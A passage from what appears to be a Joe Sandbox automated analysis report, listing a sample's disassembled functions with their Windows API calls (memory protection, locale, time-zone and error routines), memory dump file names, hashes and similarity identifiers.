                                                                                                                                                                                                                              • Opcode ID: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                                                                              • Instruction ID: 53c50025ab67e4aa2506438f86ff061d9f2cfea891a76de448224be368d4c36a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bb28053021b0cd2a62d36c1000829e863951e7d25af3afc8164462e2c0a39a0
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 38016922204B8585D7059F3AC4404BCB7B4FB18F8DB084222DF885732CEF25D156C740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4AADE0 Relevance: 1.5, APIs: 1, Instructions: 17memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • VirtualProtect.KERNELBASE(?,?,?,?,?,?,00007FF6DE4AAF20,?,?,?,?,00007FF6DE4AAABE), ref: 00007FF6DE4AAE07
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ProtectVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 544645111-0
                                                                                                                                                                                                                              • Opcode ID: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                                                                              • Instruction ID: 2d9e07c6c69296b71c749e9ca9a1243ce1ca792d8fef7d5c4745e497c018cf17
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b234133ac9701a7e180f97e51e021304d3a985ac5e6dee729acabcbe2f3f2af1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E0E0A57265CA8186D720CF15E44461EBBB0F798788F500526FA8C43A18CB7DD5688F40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4AAD30 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AllocVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 4275171209-0
                                                                                                                                                                                                                              • Opcode ID: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                                                                              • Instruction ID: d004c9bf3c3f56438ce67cafdfb1fdaff30af60cda361b7dba626f4ed58bdd37
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: aad2cdb57a82e606b8bf1909aa5a5b1721187632c9fd2cb9b286997d59227066
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7AF0B272A08A8582D720EB05F44071EBBA4F7E9798F200526FACC43B68CF7DC5658B40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4AADA0 Relevance: 1.3, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FreeVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1263568516-0
                                                                                                                                                                                                                              • Opcode ID: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                                                                              • Instruction ID: 127de2849b5df39c416d90c3480e871a0c70a3a6db93561aeecd1ce4fb438a85
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b006abb5ba116a2f71ee889648bd5e80897fb5eb5064d67c4a973468b98a7769
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: CFD0C931A18F80C1D744DB16F88510AB7A4FBD97C0F508826EACD42A28DF3CC1B98F40
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Non-executed Functions

                                                                                                                                                                                                                              Function 00007FF6DE53A03C Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 222COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE52A9A0: GetLastError.KERNEL32(?,?,?,00007FF6DE52CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6DE52CDA3), ref: 00007FF6DE52A9AF
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE52A9A0: SetLastError.KERNEL32(?,?,?,00007FF6DE52CEAA,?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF6DE52CDA3), ref: 00007FF6DE52AA4D
                                                                                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF6DE53A0A9
                                                                                                                                                                                                                              • TranslateName.LIBCMT ref: 00007FF6DE53A0E4
                                                                                                                                                                                                                              • GetACP.KERNEL32(?,?,?,00000000,00000092,00007FF6DE52717C), ref: 00007FF6DE53A129
                                                                                                                                                                                                                              • IsValidCodePage.KERNEL32(?,?,?,00000000,00000092,00007FF6DE52717C), ref: 00007FF6DE53A151
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorLastNameTranslate$CodePageValid
                                                                                                                                                                                                                              • String ID: utf8
                                                                                                                                                                                                                              • API String ID: 2136749100-905460609
                                                                                                                                                                                                                              • Opcode ID: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                                                                                                                                                                                              • Instruction ID: ef9369721b376ee83483661285f07d1c3fda756bcb8ba58382a57d3f9fafb836
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 255424f63280e3e9773fee599e4b3ae831039cf322cd8a585effd0c24e2c78c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 27918E32A08B4A81E724AF62D4202BD23A4ABA5BC0F444133FA4D87796DF7FE561C701
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE53AA70 Relevance: 10.7, APIs: 7, Instructions: 171COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Locale$CodeErrorInfoLastPageValid$DefaultEnumLocalesProcessSystemUser
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3939093798-0
                                                                                                                                                                                                                              • Opcode ID: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                                                                                                                                                                                              • Instruction ID: 0ef17de483c2f753beee28ed85f346df4e74fc0bddaab4dd74747a7536c173ef
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c0147808cd7d225f435d5f31bfa55325a6945c6d109dcf6c359c79124503561a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 63716122B08A4A46FB11AB61D8706BC33A5BF687C4F444137EA0DD7696EF3FA465C350
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4FD9D4 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3140674995-0
                                                                                                                                                                                                                              • Opcode ID: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                                                                                                                                                                                              • Instruction ID: 4948c2675b80133312380d4bb843aff9cd6ab69b952fb19aa3f65c30644840f2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4123f43c8803a46dbb8661f21826dece359977ba4a8d5ca7671b7c226e4b53b2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C4317272609B8686EB608F60E8507ED7364FB98784F44443BEA4D87B98EF3DD568C710
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE5329E0 Relevance: 9.3, APIs: 6, Instructions: 280timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_invalid_parameter_noinfo$InformationTimeZone
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 435049134-0
                                                                                                                                                                                                                              • Opcode ID: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                                                                                                                                                                                              • Instruction ID: 9a68d97bdbecbcac56a9363404f3d9747fd4d0857741726698a330a015c10ae3
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5b0683f923d1bd8e4be057a7007060db423d7f9f6ee5a361d2743fe3d83ed4ea
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 03B1D32AB08A4A45E720DF22D9611BE6361BFA4BC4F444537FA0DC7B96DF3EE4618740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE524828 Relevance: 9.2, APIs: 6, Instructions: 246COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight$_isindst$_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1405656091-0
                                                                                                                                                                                                                              • Opcode ID: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                                                                                                                                                                                              • Instruction ID: 6753e7afcc8f32fae0b2c4651686647d21c1c0e720d79ab45e055250cee04d80
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e62ff1e507688fec84e873f323350ed503463cf598c9097b0034628c948750c8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3C91C972B0468A47DB688F25C9613BC6295EB757C8F049136EA0DCB789EF3EE4518740
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE528900 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1239891234-0
                                                                                                                                                                                                                              • Opcode ID: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                                                                                                                                                                                              • Instruction ID: 86ee08f38cdadbe024f41f5b9e670b6f268486b5ba60c4cf75fa5a4ed776bcd5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 440864b89a776c0cdd248b829cf902a0f2986e84d5b3976af7ea4912e32b40c1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 22316136608B8286DB64CF65E8503AE73A4FBA8794F500137EA8D83B59DF3DD5658B00
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE4DAD60 Relevance: 7.8, APIs: 5, Instructions: 347COMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: std::rsfun
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 3764944385-0
                                                                                                                                                                                                                              • Opcode ID: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                                                                                                                                                                                              • Instruction ID: 09ffe04f6fbaad8c1029e6a268c311581e782009df722000ce8350009aec8265
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 90ea70c2fcb7a1731f4099a8b4a063127315ff39e8d3036ef66f306b6c6371e5
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3602BF36A186468BD770CB19E48462EB7A0F7D8758F104226FA9DC7B98DE3CE951CF04
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE52C47C Relevance: 7.8, APIs: 5, Instructions: 328fileCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: ErrorFileLastWrite$ConsoleOutput
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1443284424-0
                                                                                                                                                                                                                              • Opcode ID: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                                                                                                                                                                                              • Instruction ID: 427ef1943023db01f505148b7b977a63506031ae75ece47c00bd71da8a5fef0a
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e5ccdf6921700fa874654f2e7c7bf8979a8c0e057061f34df2c92357921ddb5a
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 93E10132B08B858AE710CF64D4501AD7BB1FB647C8F548136EE4E97B9ADE39E526C700
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF6DE532C74 Relevance: 6.1, APIs: 4, Instructions: 149timeCOMMONLIBRARYCODE
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DE532CA2
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE5323E0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DE5323F4
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DE532CB3
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE532380: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DE532394
                                                                                                                                                                                                                              • _get_daylight.LIBCMT ref: 00007FF6DE532CC4
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE5323B0: _invalid_parameter_noinfo.LIBCMT ref: 00007FF6DE5323C4
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE529294: HeapFree.KERNEL32(?,?,?,00007FF6DE538C78,?,?,?,00007FF6DE538FFB,?,?,00000019,00007FF6DE5396D0,?,?,?,00007FF6DE539603), ref: 00007FF6DE5292AA
                                                                                                                                                                                                                                • Part of subcall function 00007FF6DE529294: GetLastError.KERNEL32(?,?,?,00007FF6DE538C78,?,?,?,00007FF6DE538FFB,?,?,00000019,00007FF6DE5396D0,?,?,?,00007FF6DE539603), ref: 00007FF6DE5292BC
                                                                                                                                                                                                                              • GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,00007FF6DE532ED0), ref: 00007FF6DE532CEB
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000011.00000002.1859958943.00007FF6DE451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DE450000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1859940504.00007FF6DE450000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860033384.00007FF6DE541000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860056772.00007FF6DE55F000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860073509.00007FF6DE560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860091132.00007FF6DE562000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000011.00000002.1860113285.00007FF6DE565000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_17_2_7ff6de450000_NzEx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                              • String ID:
